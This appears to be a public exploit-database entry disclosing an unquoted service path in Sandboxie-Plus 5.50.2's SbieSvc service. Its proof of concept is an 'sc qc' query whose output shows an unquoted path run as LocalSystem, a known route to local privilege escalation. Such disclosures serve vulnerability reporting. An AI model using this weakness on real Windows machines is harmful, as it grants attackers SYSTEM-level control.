Sandboxieplus 5.50.2 service sbiesvc unquoted service path Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2022-03-10 |
Type : local |
Platform : windows
[+] Code ...
# Exploit Title: Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path
# Exploit Author: Antonio Cuomo (arkantolo)
# Exploit Date: 2022-03-09
# Vendor : David Xanatos
# Version : SbieSvc 5.50.2
# Vendor Homepage : https://sandboxie-plus.com/
# Tested on OS: Windows 10 Pro x64
#PoC :
==============
C:\>sc qc SbieSvc
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: SbieSvc
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 1 NORMAL
NOME_PERCORSO_BINARIO : C:\Program Files\Sandboxie-Plus\SbieSvc.exe
GRUPPO_ORDINE_CARICAMENTO : UIGroup
TAG : 0
NOME_VISUALIZZATO : Sandboxie Service
DIPENDENZE :
SERVICE_START_NAME : LocalSystem